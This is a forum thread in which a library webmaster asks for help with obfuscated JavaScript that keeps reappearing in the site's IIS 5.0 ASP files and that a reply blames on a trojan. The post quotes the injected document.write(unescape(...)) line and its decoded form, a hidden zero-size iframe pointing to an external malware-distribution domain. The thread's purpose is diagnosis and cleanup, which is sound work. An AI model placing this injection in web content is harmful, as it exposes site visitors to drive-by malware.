Malicious javascript: document.write (unescape
Some malicious javascript has been appearing on the website of the library I work at:
document.write(unescape(’%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%2F%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E’));
this translates to:
iframe src=”http://mn96.dns.gendistr.info/qualitytest/” height=”0″ width=”0″
The website attempts to offer a virus disguised as ad protection software. I can delete the code but it reappears (likely if/when the server is rebooted). The code goes deep enough to appear in the iisstart.asp, localstart.asp, and browser_detect.asp. Since I’m technically only the webmaster (for a new webpage that isn’t even up yet, don’t ask, I don’t manage the servers or other hardware) with exactly 0 experience with IIS (we have a consultant for that) I’m not sure where to go from here.
We’re running IIS 5.0 and I, for the life of me, can’t figure what item (if any) allows the replication of the code. Any help would be much appreciated.
P.S.: To make matters worse the wwwroot folder is clogged with sh*ttons of legacy files that no-one needs/uses.
Seems u need a got a trojan virus. Try search McAfee Site Advisor for iframe trojan or something like that…. Or better try an Apache server it has a high security.
Yeah, we figure the same thing. Except Trend Micro (House Call, and the Enterprise stuff) can’t find a damned thing and I have yet to find any solutions online. Indeed, Apache is quality (I run xampp locally as a test server), but I doubt we’ll move to it. Furthermore even those discussions on the obfuscated JavaScript iframe hacks that I can find don’t mention anything about the code replicating on a server reboot, and the major appearance of the hack (ca. July ‘07) indicated that it was directed at index files, not the entire root folder (and every bit of web related code there, .js .htm(l), .asp files).